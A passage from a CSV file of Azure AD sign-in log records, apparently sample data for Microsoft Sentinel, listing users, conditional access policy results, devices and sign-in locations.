MCAS Step-up', 'result': 'notApplied', 'id': '83a057fb-dbca-4ba8-bb5f-0ce6d6e7cff5'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Form MCAS', 'result': 'notApplied', 'id': 'bcd93f74-64fd-4042-a3ae-ee6d48886d6d'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'GBB demo', 'result': 'notApplied', 'id': 'b2915792-0396-4abe-94ec-e17fa17243c5'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Azure MFA', 'result': 'notEnabled', 'id': '5fd0c4ff-1cd7-4bf6-8607-294a04f58f12'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 2, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 1, 'displayName': 'Semolen - Admin MFA', 'result': 'notApplied', 'id': '4c5a5ea0-5d9f-4730-baaa-7a69cf29ef26'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'On-Prem SharePoint - MeganB proxy', 'result': 'notApplied', 'id': '2e76d011-eaa3-40b4-8ce8-7fba52bf3af8'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Test Policy', 'result': 'notApplied', 'id': '73b07c2f-ef9f-4b21-9e02-c0b1013c09c4'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Block Access JulianI', 'result': 'notApplied', 'id': 'ba36f0a4-6d73-4ba4-9282-3b3c14575e36'}]",notApplied,08/04/2020 04:21,"{'operatingSystem': 'Windows 8', 'deviceId': '', 'browser': 'Rich Client 5.0.5.0'}",3109113e-8f92-47c2-a124-24835fe10300,,,"{'countryOrRegion': 'US', 'geoCoordinates': {'longitude': -78.26995086669922, 'latitude': 36.64046859741211}, 'state': 'Virginia', 'city': 'Boydton'}",none,none,none,none,[],{'errorCode': 0},On-Premises Directory Synchronization Service Account,b5084e7d-75cb-41c3-949b-bf61e1f9636b,,4b2462a4-bbee-495a-a0e1-f23ae524cc9c,Windows Azure Active Directory,3109113e-8f92-47c2-a124-24835fe10300,SigninLogs,Sucess,36.6404686,-78.26995087
+1861,ab86c959-1ba3-495c-a00d-ced30d8825d3,Azure AD,43:43.9,/tenants/4b2462a4-bbee-495a-a0e1-f23ae524cc9c/providers/Microsoft.aadiam,Sign-in activity,1,SignInLogs,0,None,,0,cfcf3990-7152-4749-81ff-b96f50d59f00,Microsoft.aadiam,Microsoft.aadiam,,Sentinel Partner Account 6,4,IN,Azure Portal,c44b4083-3bb0-49c1-b47d-974e53cbdf3c,Browser,"[{'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Proxy', 'result': 'notApplied', 'id': '8872f6fb-da88-4b63-bcc7-17247669596b'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Megan MFA demo', 'result': 'notEnabled', 'id': '235bec94-f744-48ac-8314-5675953d2def'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Step-up', 'result': 'notApplied', 'id': '83a057fb-dbca-4ba8-bb5f-0ce6d6e7cff5'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Form MCAS', 'result': 'notApplied', 'id': 'bcd93f74-64fd-4042-a3ae-ee6d48886d6d'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'GBB demo', 'result': 'notApplied', 'id': 'b2915792-0396-4abe-94ec-e17fa17243c5'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Azure MFA', 'result': 'notEnabled', 'id': '5fd0c4ff-1cd7-4bf6-8607-294a04f58f12'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 2, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 1, 'displayName': 'Semolen - Admin MFA', 'result': 'notApplied', 'id': '4c5a5ea0-5d9f-4730-baaa-7a69cf29ef26'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'On-Prem SharePoint - MeganB proxy', 'result': 'notApplied', 'id': '2e76d011-eaa3-40b4-8ce8-7fba52bf3af8'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Test Policy', 'result': 'notApplied', 'id': '73b07c2f-ef9f-4b21-9e02-c0b1013c09c4'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Block Access JulianI', 'result': 'notApplied', 'id': 'ba36f0a4-6d73-4ba4-9282-3b3c14575e36'}]",notApplied,08/04/2020 04:43,"{'operatingSystem': 'Windows 10', 'deviceId': '', 'browser': 'Chrome 80.0.3987'}",4445394f-bc55-4988-8502-680d146c0500,,,"{'countryOrRegion': 'IN', 'geoCoordinates': {'longitude': 72.87770080566406, 'latitude': 19.076000213623047}, 'state': 'Maharashtra', 'city': 'Mumbai'}",none,none,none,none,[],{'errorCode': 0},Sentinel Partner Account 6,dd7e1752-57a8-4e72-8589-6a68e4a1f500,,4b2462a4-bbee-495a-a0e1-f23ae524cc9c,Windows Azure Service Management API,4445394f-bc55-4988-8502-680d146c0500,SigninLogs,Sucess,19.07600021,72.87770081
+1862,ab86c959-1ba3-495c-a00d-ced30d8825d3,Azure AD,05:46.2,/tenants/4b2462a4-bbee-495a-a0e1-f23ae524cc9c/providers/Microsoft.aadiam,Sign-in activity,1,SignInLogs,0,None,,0,2e6fd17c-1227-433e-b3a3-80a74374a7dc,Microsoft.aadiam,Microsoft.aadiam,,Ofer Shezaf,4,IL,Azure Portal,c44b4083-3bb0-49c1-b47d-974e53cbdf3c,Browser,"[{'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Proxy', 'result': 'notApplied', 'id': '8872f6fb-da88-4b63-bcc7-17247669596b'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Megan MFA demo', 'result': 'notEnabled', 'id': '235bec94-f744-48ac-8314-5675953d2def'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Step-up', 'result': 'notApplied', 'id': '83a057fb-dbca-4ba8-bb5f-0ce6d6e7cff5'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Form MCAS', 'result': 'notApplied', 'id': 'bcd93f74-64fd-4042-a3ae-ee6d48886d6d'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'GBB demo', 'result': 'notApplied', 'id': 'b2915792-0396-4abe-94ec-e17fa17243c5'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Azure MFA', 'result': 'notEnabled', 'id': '5fd0c4ff-1cd7-4bf6-8607-294a04f58f12'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 2, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 1, 'displayName': 'Semolen - Admin MFA', 'result': 'notApplied', 'id': '4c5a5ea0-5d9f-4730-baaa-7a69cf29ef26'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'On-Prem SharePoint - MeganB proxy', 'result': 'notApplied', 'id': '2e76d011-eaa3-40b4-8ce8-7fba52bf3af8'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Test Policy', 'result': 'notApplied', 'id': '73b07c2f-ef9f-4b21-9e02-c0b1013c09c4'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Block Access JulianI', 'result': 'notApplied', 'id': 'ba36f0a4-6d73-4ba4-9282-3b3c14575e36'}]",notApplied,08/04/2020 05:05,"{'operatingSystem': 'Windows 10', 'deviceId': '', 'browser': 'Chrome 80.0.3987'}",98dc8e9a-f4c7-40e8-8c8c-df654e6a0400,,,"{'countryOrRegion': 'IL', 'geoCoordinates': {'longitude': 35.44601058959961, 'latitude': 33.017520904541016}, 'state': 'Hazafon', 'city': 'Jish'}",none,none,none,none,[],{'errorCode': 0},Ofer Shezaf,9c459db5-0407-43fe-a2ea-126757297beb,,4b2462a4-bbee-495a-a0e1-f23ae524cc9c,Windows Azure Service Management API,98dc8e9a-f4c7-40e8-8c8c-df654e6a0400,SigninLogs,Sucess,33.0175209,35.44601059
+1863,ab86c959-1ba3-495c-a00d-ced30d8825d3,Azure AD,51:05.2,/tenants/4b2462a4-bbee-495a-a0e1-f23ae524cc9c/providers/Microsoft.aadiam,Sign-in activity,1,SignInLogs,0,None,,0,b8cc76ec-8f42-4b59-9486-2557b3627f1a,Microsoft.aadiam,Microsoft.aadiam,,On-Premises Directory Synchronization Service Account,4,US,Microsoft Azure Active Directory Connect,cb1056e2-e479-49de-ae31-7812af012ed8,Mobile Apps and Desktop clients,"[{'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Proxy', 'result': 'notApplied', 'id': '8872f6fb-da88-4b63-bcc7-17247669596b'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Megan MFA demo', 'result': 'notEnabled', 'id': '235bec94-f744-48ac-8314-5675953d2def'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Step-up', 'result': 'notApplied', 'id': '83a057fb-dbca-4ba8-bb5f-0ce6d6e7cff5'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Form MCAS', 'result': 'notApplied', 'id': 'bcd93f74-64fd-4042-a3ae-ee6d48886d6d'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'GBB demo', 'result': 'notApplied', 'id': 'b2915792-0396-4abe-94ec-e17fa17243c5'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Azure MFA', 'result': 'notEnabled', 'id': '5fd0c4ff-1cd7-4bf6-8607-294a04f58f12'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 2, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 1, 'displayName': 'Semolen - Admin MFA', 'result': 'notApplied', 'id': '4c5a5ea0-5d9f-4730-baaa-7a69cf29ef26'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'On-Prem SharePoint - MeganB proxy', 'result': 'notApplied', 'id': '2e76d011-eaa3-40b4-8ce8-7fba52bf3af8'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Test Policy', 'result': 'notApplied', 'id': '73b07c2f-ef9f-4b21-9e02-c0b1013c09c4'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Block Access JulianI', 'result': 'notApplied', 'id': 'ba36f0a4-6d73-4ba4-9282-3b3c14575e36'}]",notApplied,08/04/2020 04:51,"{'operatingSystem': 'Windows 8', 'deviceId': '', 'browser': 'Rich Client 5.0.5.0'}",89223cb6-60af-4a3e-b2e1-94702aae0400,,,"{'countryOrRegion': 'US', 'geoCoordinates': {'longitude': -78.26995086669922, 'latitude': 36.64046859741211}, 'state': 'Virginia', 'city': 'Boydton'}",none,none,none,none,[],{'errorCode': 0},On-Premises Directory Synchronization Service Account,b5084e7d-75cb-41c3-949b-bf61e1f9636b,,4b2462a4-bbee-495a-a0e1-f23ae524cc9c,Windows Azure Active Directory,89223cb6-60af-4a3e-b2e1-94702aae0400,SigninLogs,Sucess,36.6404686,-78.26995087
+1864,ab86c959-1ba3-495c-a00d-ced30d8825d3,Azure AD,50:57.4,/tenants/4b2462a4-bbee-495a-a0e1-f23ae524cc9c/providers/Microsoft.aadiam,Sign-in activity,1,SignInLogs,0,None,,0,c3c672fc-af2f-414e-8114-c225c11d5d87,Microsoft.aadiam,Microsoft.aadiam,,On-Premises Directory Synchronization Service Account,4,US,Microsoft Azure Active Directory Connect,cb1056e2-e479-49de-ae31-7812af012ed8,Mobile Apps and Desktop clients,"[{'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Proxy', 'result': 'notApplied', 'id': '8872f6fb-da88-4b63-bcc7-17247669596b'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Megan MFA demo', 'result': 'notEnabled', 'id': '235bec94-f744-48ac-8314-5675953d2def'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Step-up', 'result': 'notApplied', 'id': '83a057fb-dbca-4ba8-bb5f-0ce6d6e7cff5'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Form MCAS', 'result': 'notApplied', 'id': 'bcd93f74-64fd-4042-a3ae-ee6d48886d6d'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'GBB demo', 'result': 'notApplied', 'id': 'b2915792-0396-4abe-94ec-e17fa17243c5'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Azure MFA', 'result': 'notEnabled', 'id': '5fd0c4ff-1cd7-4bf6-8607-294a04f58f12'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 2, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 1, 'displayName': 'Semolen - Admin MFA', 'result': 'notApplied', 'id': '4c5a5ea0-5d9f-4730-baaa-7a69cf29ef26'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'On-Prem SharePoint - MeganB proxy', 'result': 'notApplied', 'id': '2e76d011-eaa3-40b4-8ce8-7fba52bf3af8'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Test Policy', 'result': 'notApplied', 'id': '73b07c2f-ef9f-4b21-9e02-c0b1013c09c4'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Block Access JulianI', 'result': 'notApplied', 'id': 'ba36f0a4-6d73-4ba4-9282-3b3c14575e36'}]",notApplied,08/04/2020 04:50,"{'operatingSystem': 'Windows 8', 'deviceId': '', 'browser': 'Rich Client 5.0.5.0'}",d09c2317-414d-4072-ab4f-d2f618a70500,,,"{'countryOrRegion': 'US', 'geoCoordinates': {'longitude': -78.26995086669922, 'latitude': 36.64046859741211}, 'state': 'Virginia', 'city': 'Boydton'}",none,none,none,none,[],{'errorCode': 0},On-Premises Directory Synchronization Service Account,b5084e7d-75cb-41c3-949b-bf61e1f9636b,,4b2462a4-bbee-495a-a0e1-f23ae524cc9c,Windows Azure Active Directory,d09c2317-414d-4072-ab4f-d2f618a70500,SigninLogs,Sucess,36.6404686,-78.26995087
+1865,ab86c959-1ba3-495c-a00d-ced30d8825d3,Azure AD,50:57.4,/tenants/4b2462a4-bbee-495a-a0e1-f23ae524cc9c/providers/Microsoft.aadiam,Sign-in activity,1,SignInLogs,0,None,,0,c3c672fc-af2f-414e-8114-c225c11d5d87,Microsoft.aadiam,Microsoft.aadiam,,On-Premises Directory Synchronization Service Account,4,US,Microsoft Azure Active Directory Connect,cb1056e2-e479-49de-ae31-7812af012ed8,Mobile Apps and Desktop clients,"[{'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Proxy', 'result': 'notApplied', 'id': '8872f6fb-da88-4b63-bcc7-17247669596b'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Megan MFA demo', 'result': 'notEnabled', 'id': '235bec94-f744-48ac-8314-5675953d2def'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Step-up', 'result': 'notApplied', 'id': '83a057fb-dbca-4ba8-bb5f-0ce6d6e7cff5'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Form MCAS', 'result': 'notApplied', 'id': 'bcd93f74-64fd-4042-a3ae-ee6d48886d6d'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'GBB demo', 'result': 'notApplied', 'id': 'b2915792-0396-4abe-94ec-e17fa17243c5'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Azure MFA', 'result': 'notEnabled', 'id': '5fd0c4ff-1cd7-4bf6-8607-294a04f58f12'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 2, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 1, 'displayName': 'Semolen - Admin MFA', 'result': 'notApplied', 'id': '4c5a5ea0-5d9f-4730-baaa-7a69cf29ef26'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'On-Prem SharePoint - MeganB proxy', 'result': 'notApplied', 'id': '2e76d011-eaa3-40b4-8ce8-7fba52bf3af8'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Test Policy', 'result': 'notApplied', 'id': '73b07c2f-ef9f-4b21-9e02-c0b1013c09c4'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Block Access JulianI', 'result': 'notApplied', 'id': 'ba36f0a4-6d73-4ba4-9282-3b3c14575e36'}]",notApplied,08/04/2020 04:50,"{'operatingSystem': 'Windows 8', 'deviceId': '', 'browser': 'Rich Client 5.0.5.0'}",d09c2317-414d-4072-ab4f-d2f618a70500,,,"{'countryOrRegion': 'US', 'geoCoordinates': {'longitude': -78.26995086669922, 'latitude': 36.64046859741211}, 'state': 'Virginia', 'city': 'Boydton'}",none,none,none,none,[],{'errorCode': 0},On-Premises Directory Synchronization Service Account,b5084e7d-75cb-41c3-949b-bf61e1f9636b,,4b2462a4-bbee-495a-a0e1-f23ae524cc9c,Windows Azure Active Directory,d09c2317-414d-4072-ab4f-d2f618a70500,SigninLogs,Sucess,36.6404686,-78.26995087
+1866,ab86c959-1ba3-495c-a00d-ced30d8825d3,Azure AD,51:05.2,/tenants/4b2462a4-bbee-495a-a0e1-f23ae524cc9c/providers/Microsoft.aadiam,Sign-in activity,1,SignInLogs,0,None,,0,b8cc76ec-8f42-4b59-9486-2557b3627f1a,Microsoft.aadiam,Microsoft.aadiam,,On-Premises Directory Synchronization Service Account,4,US,Microsoft Azure Active Directory Connect,cb1056e2-e479-49de-ae31-7812af012ed8,Mobile Apps and Desktop clients,"[{'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Proxy', 'result': 'notApplied', 'id': '8872f6fb-da88-4b63-bcc7-17247669596b'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Megan MFA demo', 'result': 'notEnabled', 'id': '235bec94-f744-48ac-8314-5675953d2def'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Step-up', 'result': 'notApplied', 'id': '83a057fb-dbca-4ba8-bb5f-0ce6d6e7cff5'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Form MCAS', 'result': 'notApplied', 'id': 'bcd93f74-64fd-4042-a3ae-ee6d48886d6d'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'GBB demo', 'result': 'notApplied', 'id': 'b2915792-0396-4abe-94ec-e17fa17243c5'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Azure MFA', 'result': 'notEnabled', 'id': '5fd0c4ff-1cd7-4bf6-8607-294a04f58f12'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 2, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 1, 'displayName': 'Semolen - Admin MFA', 'result': 'notApplied', 'id': '4c5a5ea0-5d9f-4730-baaa-7a69cf29ef26'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'On-Prem SharePoint - MeganB proxy', 'result': 'notApplied', 'id': '2e76d011-eaa3-40b4-8ce8-7fba52bf3af8'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Test Policy', 'result': 'notApplied', 'id': '73b07c2f-ef9f-4b21-9e02-c0b1013c09c4'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Block Access JulianI', 'result': 'notApplied', 'id': 'ba36f0a4-6d73-4ba4-9282-3b3c14575e36'}]",notApplied,08/04/2020 04:51,"{'operatingSystem': 'Windows 8', 'deviceId': '', 'browser': 'Rich Client 5.0.5.0'}",89223cb6-60af-4a3e-b2e1-94702aae0400,,,"{'countryOrRegion': 'US', 'geoCoordinates': {'longitude': -78.26995086669922, 'latitude': 36.64046859741211}, 'state': 'Virginia', 'city': 'Boydton'}",none,none,none,none,[],{'errorCode': 0},On-Premises Directory Synchronization Service Account,b5084e7d-75cb-41c3-949b-bf61e1f9636b,,4b2462a4-bbee-495a-a0e1-f23ae524cc9c,Windows Azure Active Directory,89223cb6-60af-4a3e-b2e1-94702aae0400,SigninLogs,Sucess,36.6404686,-78.26995087
+1867,ab86c959-1ba3-495c-a00d-ced30d8825d3,Azure AD,54:48.6,/tenants/4b2462a4-bbee-495a-a0e1-f23ae524cc9c/providers/Microsoft.aadiam,Sign-in activity,1,SignInLogs,0,None,,0,29592158-7166-406a-8157-9b7da4661331,Microsoft.aadiam,Microsoft.aadiam,,Yechiel Levin,4,IL,Azure Portal,c44b4083-3bb0-49c1-b47d-974e53cbdf3c,Browser,"[{'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Proxy', 'result': 'notApplied', 'id': '8872f6fb-da88-4b63-bcc7-17247669596b'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Megan MFA demo', 'result': 'notEnabled', 'id': '235bec94-f744-48ac-8314-5675953d2def'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Step-up', 'result': 'notApplied', 'id': '83a057fb-dbca-4ba8-bb5f-0ce6d6e7cff5'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Form MCAS', 'result': 'notApplied', 'id': 'bcd93f74-64fd-4042-a3ae-ee6d48886d6d'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'GBB demo', 'result': 'notApplied', 'id': 'b2915792-0396-4abe-94ec-e17fa17243c5'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Azure MFA', 'result': 'notEnabled', 'id': '5fd0c4ff-1cd7-4bf6-8607-294a04f58f12'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 2, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 1, 'displayName': 'Semolen - Admin MFA', 'result': 'notApplied', 'id': '4c5a5ea0-5d9f-4730-baaa-7a69cf29ef26'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'On-Prem SharePoint - MeganB proxy', 'result': 'notApplied', 'id': '2e76d011-eaa3-40b4-8ce8-7fba52bf3af8'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Test Policy', 'result': 'notApplied', 'id': '73b07c2f-ef9f-4b21-9e02-c0b1013c09c4'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Block Access JulianI', 'result': 'notApplied', 'id': 'ba36f0a4-6d73-4ba4-9282-3b3c14575e36'}]",notApplied,08/04/2020 04:54,"{'operatingSystem': 'Windows 10', 'deviceId': '8a35c785-7c5f-463a-ab5e-126c006191f1', 'browser': 'Edge 18.1836', 'displayName': 'YELEVIN-X1', 'trustType': 'Hybrid Azure AD joined', 'isCompliant': True, 'isManaged': True}",d74d16e8-bec1-4887-b132-ef933ad62600,,,"{'countryOrRegion': 'IL', 'geoCoordinates': {'longitude': 34.887760162353516, 'latitude': 32.084041595458984}, 'state': 'Hamerkaz', 'city': 'Petah Tikva'}",none,none,none,none,[],{'errorCode': 0},Yechiel Levin,71505601-c694-45ce-8220-4799035a14f5,,4b2462a4-bbee-495a-a0e1-f23ae524cc9c,Windows Azure Service Management API,d74d16e8-bec1-4887-b132-ef933ad62600,SigninLogs,Sucess,32.0840416,34.88776016
